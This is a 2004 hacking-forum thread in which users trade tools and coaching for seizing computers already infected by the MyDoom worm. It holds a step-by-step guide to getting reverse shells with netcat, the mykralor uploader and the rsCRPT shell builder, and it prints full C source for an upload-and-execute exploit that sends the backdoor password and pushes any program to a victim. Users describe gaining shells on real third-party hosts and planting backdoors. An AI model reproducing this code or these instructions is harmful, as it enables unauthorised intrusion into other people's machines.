still don't got no shell i've got netcat listening and i did what jimmy said i've got this :
QUOTE
[+] Reading file to send (max length 1599bytes) ...Done [+] Connecting to infected ip ...Done [+] Sending file ...Done [+] Exiting.
but still no shell
ducky
Feb 9 2004, 07:46 PM
try : nc -v -L -p <port> -t
Works for me...just need to wait a minute or so and it sends the shell...
Didn't get admin on any host till now...
Yemoke
Feb 9 2004, 07:49 PM
i get admin on all my hosts ( all hosts are 2 )
XtrA
Feb 9 2004, 07:52 PM
I get in to the victim i upload nc.exe and then nc.bat that there i wrote: nc -v -L -p 1133 -t and all ok:
CODE
[+] Opening File [+] File found ready to send [+] Connected [+] Sending executable. [+] All done, server have now executed your executable!
but i cant get in through nc like: nc [ip] 1133
why is that?
vnet576
Feb 9 2004, 07:57 PM
This is just something to think about...what do all of the computers infected with mydoom have in common?
THEY ALL HAVE AN ANTIVIRUS INSTALLED AND RUNNING UNDER AUTOPROTECT!
net start These Windows services are started:
SAVScan Norton AntiVirus Auto Protect Service Norton Unerase Protection Symantec Core LC Symantec Event Manager Symantec Settings Manager
Yemoke
Feb 9 2004, 08:04 PM
QUOTE (vnet576 @ Feb 9 2004, 07:57 PM)
This is just something to think about...what do all of the computers infected with mydoom have in common?
THEY ALL HAVE AN ANTIVIRUS INSTALLED AND RUNNING UNDER AUTOPROTECT!
net start These Windows services are started:
SAVScan Norton AntiVirus Auto Protect Service Norton Unerase Protection Symantec Core LC Symantec Event Manager Symantec Settings Manager
i have hacked a pc with norton allready nothing gets detected if you good with your files
vnet576
Feb 9 2004, 08:09 PM
QUOTE (Yemoke @ Feb 9 2004, 03:04 PM)
QUOTE (vnet576 @ Feb 9 2004, 07:57 PM)
This is just something to think about...what do all of the computers infected with mydoom have in common?
THEY ALL HAVE AN ANTIVIRUS INSTALLED AND RUNNING UNDER AUTOPROTECT!
net start These Windows services are started:
SAVScan Norton AntiVirus Auto Protect Service Norton Unerase Protection Symantec Core LC Symantec Event Manager Symantec Settings Manager
i have hacked a pc with norton allready nothing gets detected if you good with your files
Ok..you kinda missed the point of my post....what I meant is that people and the media are saying how if everybody had an anitivirus installed this worm would've never gotten this widespread. Well everybody who got infected does have an antivirus installe.d
x1`
Feb 9 2004, 08:10 PM
k someone give me instructions excatly what u do cant get 1 shell , k ive open crpt.exe put my ip and port i want it to bind to and save it as shell and then i open mykralor , do mykralor XXX.XXX.XXX.XXX 3127 shell open nc ip [and the port i choose in crpt ,] is this correct ?
ThE_snAke
Feb 9 2004, 08:22 PM
10XXXX mannnnn
woot 1.5 = max files size
Yemoke
Feb 9 2004, 08:24 PM
good exploit ssst but i have a 200kb/s one
clip
Feb 9 2004, 08:26 PM
lol.. some of you people are laughable you dont even understand what a reverse shell is. And Spike.. that was a pretty obvious ripoff of my code.. but whatever just make it "less" obvious next time
Soulwax
Feb 9 2004, 08:27 PM
Thx alot for those nice tools, gonna check it out.
Soulwax
yeyo
Feb 9 2004, 08:36 PM
Thanks man, lets try it
DHS
Feb 9 2004, 08:39 PM
great tool dude...
i got 2 shells already but at both i didnt had any admin rights too bad. Though a friend of me had one where he did have such rights. So.... anyway.... thx for this tool... works like a charm
GreetZ
vnet576
Feb 9 2004, 08:45 PM
QUOTE (DHS @ Feb 9 2004, 03:39 PM)
great tool dude...
i got 2 shells already but at both i didnt had any admin rights too bad. Though a friend of me had one where he did have such rights. So.... anyway.... thx for this tool... works like a charm
GreetZ
How could u not have admin rights? The virus installs itself as a localsystem file. Teh virus modifies the registry, it uses dll injection to place itself inside eplorer.exe...it could not do that unless it had system rights.
ThE_snAke
Feb 9 2004, 08:48 PM
I tried 3 ips , always got this message:
[+] Reading file to send (max length 1599bytes) ...Done [+] Connecting to infected ip ...Done [+] Sending file ...Done [+] Exiting.
it didn't connect to shell
x1`
Feb 9 2004, 08:56 PM
same for me i need someone to write a tut on exactly what to do and what they did for the people that got shells ....thx
Rocky2you
Feb 9 2004, 08:57 PM
I must be the dummest mf on this board i guess because i cant figure out the damn exploit I use the rsCRT.exe and i fill in my ip and netcat port , then i need to save ? something ....save what and where??
Thanks for helping out
slex
Feb 9 2004, 09:00 PM
^^ work nice for me .. but I can't compile clip and spikie file under cygwin .. perhaps someone have pass it .. tnx
Deltax
Feb 9 2004, 09:01 PM
omg noobs the prog works sooo easy..
thnx for the tools btw
Alien
Feb 9 2004, 09:04 PM
QUOTE (Dickybob20 @ Feb 9 2004, 08:56 PM)
same for me i need someone to write a tut on exactly what to do and what they did for the people that got shells ....thx
it's very simple ;]
create a *.bat file with: nc -l -p PORT -e cmd.exe
mykralor.exe IP PORT nc.exe mykralor.exe IP PORT *.bat
and connect with telnet telnet IP PORT
Rocky2you
Feb 9 2004, 09:05 PM
ok , me is a noob....but still need help on how to do this Thanks
MxMx
Feb 9 2004, 09:05 PM
w00w .. 10x ..
really works great ...
noobs .. please .. stop asking .. '' how to do this'' or ''why dont i get a shell''.. before asking .. you should read some basic security articals .. about netcat for instance ..
Rocky2you
Feb 9 2004, 09:08 PM
MxMx...you where born as a know all??
x1`
Feb 9 2004, 09:09 PM
it's very simple ;]
create a *.bat file with: nc -l -p PORT -e cmd.exe
mykralor.exe IP PORT nc.exe mykralor.exe IP PORT *.bat
and connect with telnet telnet IP PORT
how about u upload the bat so i can see and edit the ips
slex
Feb 9 2004, 09:10 PM
QUOTE
it's very simple ;]
create a *.bat file with: nc -l -p PORT -e cmd.exe
mykralor.exe IP PORT nc.exe mykralor.exe IP PORT *.bat
and connect with telnet telnet IP PORT
oki but with which exploit send u nc.exe I have test with [Crpt] mykralor v1.0 by kralor [Crpt] and it's the result ...
[+] Reading file to send (max length 1599bytes) ...error: file too long [+] Exiting.
ThE_snAke
Feb 9 2004, 09:10 PM
10x for the help ALIEN
x1`
Feb 9 2004, 09:20 PM
when i do mykrayor.exe ip port nc.exe it says nc is to big , so its not correct i am trying with this crpt thing ... i dont understand why i have to type my ip in this and not the targets ip..
still having trouble with connect with netcat
straight after i send the reverse shell code i do
nc -v XXX.xxx.xxx.xxx -l -p 333 -e cmd.exe
and dosent work it just hangs and does nothing
Killa
Feb 9 2004, 09:21 PM
Very nice job you did here
Thanks for this
Greetz Killa
bambipower
Feb 9 2004, 09:21 PM
working famous
nice tool btw
technoboy
Feb 9 2004, 09:25 PM
thanks alot for posting this
Alien
Feb 9 2004, 09:27 PM
sorry i forgot mykrarol only 1599 bytes...
run netcat: nc -l -vv -p 99 >>its only example and run rsCRT-v1.0 fill in you IP and PORT with run netcat (99) and click Create, save this file as shell.exe and upload mykralor.exe IP PORT shell.exe wait a minute and you got a shell!!!
Major Chrome
Feb 9 2004, 09:28 PM
Excellent work on this, seems like this could be a serious exploit if someone is dumb enough to open the attachment.
x1`
Feb 9 2004, 09:34 PM
ok ive got shell at last my problem i wasnt waiting long enough thx alot for the info
[Ripper]
Feb 9 2004, 09:50 PM
thx allot for this exploit will take a deeper look into it
sPiKie
Feb 9 2004, 10:12 PM
Ok, for those retards that didnt read the author of this topic? I wrote down everything you need to know.. Here is a newbie guide...
1. Get NetCat and run it like this: 'nc.exe -l -vv -p 666' It will now listen for any connection on port 666, means that he waits on the cmd.exe to arrive 2. Use rsCRPT to create the Remote Shell .exe file, that is under 1599bytes.. What rsCRPT does is that he creates a reverse shellcode, that connects to your listening specified port and "arrives with cmd.exe"... So in rsCRPT you does this: Enter your IP, then enter the listening port you got on NetCat, in this example 666.
Note: Many pc's have like "firewalls/portblockers/hackerdefenders" so it can't open the port, but then you should use the port 3128, because 3127 is open and most probably 3128 is also open
3. Now when you have created the reverse shellcode .exe file.. Start mykralor.exe... Usage is like this mykralor.exe <ip of victim> <port probably 3127> <your .exe shellcode>
4. When you have done this, you will get your shell on "the listening NetCat" if it succed..!
Or you can just download mine MyDoom.A Upload/Exec source code, it is in this thread... Because in mykralor, my friend kralor wanted to make it like this: Promote his new program rsCRPT, so everybody that downloads mykralor.exe will probably download rsCRPT too To promote And his program got a file resritcions inside, so you got no choise if your a scriptie Hehe.. But down you can see mine program, it can upload any file, even if its 2000mb.. Yehaw start spreading warez on Mydoom The new KAZAA
Here is mine source code if you didn't get it or dont have time to go trought all this post in this thread :
CODE
/**************************************/ /* Copyrights 2004 sPiKie tha m4st3r */ /* Made to a friend */ /**************************************/ #include <stdio.h> #include <string.h> #include <winsock.h>
#pragma comment (lib,"ws2_32")
int main(int argc,char *argv[]) { int sockfd, numbytes;
struct hostent *he; struct sockaddr_in their_addr; // connector's address information char doompassword[] = "\x85\x13\x3c\x9e\xa2"; //the backdoors uses a password to open CreateProcess();) char buf[1024]; int read=0; FILE *fuckfile; WSADATA wsaData; //thihihi
fuckfile = fopen(argv[3],"rb"); if (fuckfile==NULL) { printf("[-] Open Failed\n"); return -1; } printf("[+] File found ready to send\n"); if(WSAStartup(0x101,&wsaData)) { printf("[-] Unable to load winsock.\n"); return -1; } if ((he=gethostbyname(argv[1])) == NULL) { // get the host info printf("[-] GetHostByName() Error!\n"); return -1; } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("[-] Can't open socket!\n"); return -1; } their_addr.sin_family = AF_INET; // host byte order their_addr.sin_port = htons(atoi(argv[2])); // port their_addr.sin_addr = *((struct in_addr *)he->h_addr); //memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) { printf("[-] Connecting error\n"); return -1; } printf("[+] Connected\n[+] Sending executable.\n"); send(sockfd,doompassword,5,0); //sending the password :) while (!feof(fuckfile)) { read = fread(buf,sizeof(char),sizeof(buf),fuckfile); if ((numbytes=send(sockfd,buf,read,0)) == -1) { printf("[-] Sending executable failed\n"); return -1; } printf("."); } printf("[+] All done, server have now executed your executable!\n"); closesocket(sockfd); WSACleanup(); return 0; }
Use this only on your own computers..
TheOther
Feb 9 2004, 10:17 PM
I think this board needs to filter out some words like: "It doesn't work", "What do I have to do",.......
If you haven't understand this after 6 pages, don't bother the rest.
Alien
Feb 9 2004, 10:20 PM
very nice exploit but i had error with compile ;/
CODE
doom.obj .text: undefined reference to '_WSAStartup@8' doom.obj .text: undefined reference to '_gethostbyname@4' doom.obj .text: undefined reference to '_socket@12' doom.obj .text: undefined reference to '_htons@4' doom.obj .text: undefined reference to '_connect@12' doom.obj .text: undefined reference to '_send@16' doom.obj .text: undefined reference to '_closesocket@4' doom.obj .text: undefined reference to '_WSACleanup@0'
boshcash
Feb 9 2004, 10:34 PM
guys dont waste ur time understanding the reverse cmd shell , just get the spikie c code and compile it , it will remove that stupid that file limitation , and then upload ur fat R.A. program and play as u like . NOTE : dont compile the first one , move some posts and see another one where u can compile ..
XeRoGrApH
Feb 9 2004, 10:56 PM
1st results comin here and its a pure roll
Wonder how long this exploit will stay up
vnet576
Feb 9 2004, 11:18 PM
QUOTE (Alien @ Feb 9 2004, 05:20 PM)
very nice exploit but i had error with compile ;/
CODE
doom.obj .text: undefined reference to '_WSAStartup@8' doom.obj .text: undefined reference to '_gethostbyname@4' doom.obj .text: undefined reference to '_socket@12' doom.obj .text: undefined reference to '_htons@4' doom.obj .text: undefined reference to '_connect@12' doom.obj .text: undefined reference to '_send@16' doom.obj .text: undefined reference to '_closesocket@4' doom.obj .text: undefined reference to '_WSACleanup@0'
thats a winsock problem..link ws2_32.lib to u're project.
phaeton
Feb 9 2004, 11:28 PM
great stuff, works fine here. now gotta start patching some boxes
Major Chrome
Feb 9 2004, 11:39 PM
Compiled yours Spikie,
Sending the file just fine for me, not sure if it is executing it properly, I place a backdoor on the box with yours, says it sends and executes, but I'm not so sure its executing properly.
sPiKie
Feb 9 2004, 11:44 PM
Im sure it is executing properly.. Try it local dude ;P By the way MyDoom.A uses CreateProcess(); to run the "binary"..
Major Chrome
Feb 9 2004, 11:46 PM
QUOTE (sPiKie @ Feb 9 2004, 11:44 PM)
Im sure it is executing properly.. Try it local dude ;P By the way MyDoom.A uses CreateProcess(); to run the "binary"..
Sorry to sound like a complete idiot but how would I go about that, would I not need the virus installed on my computer?
Maybe I made a mistake compiliing it
Edit: My apologies, I had the wrong IP, I had an IP for an infected box but I typed it wrong, my mistake, now I sound stupid. Its working perfect now, Thanks!
Alien
Feb 9 2004, 11:51 PM
Thank you vnet576 !! compiled succesfully
CRW
Feb 10 2004, 12:03 AM
i have problem with that exploit i get :
listening on [any] 666 ... connect to [MyIP] from ccb06.chir.uniroma1.it [ServerIP] 2643 sent 0, rcvd 0
C:\m>
what's that mean
?
popo0421
Feb 10 2004, 12:18 AM
test 10 hosts. results is 1 success. 9 fail. Anyway ..... thanks share,
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
( all hosts are 2 
)
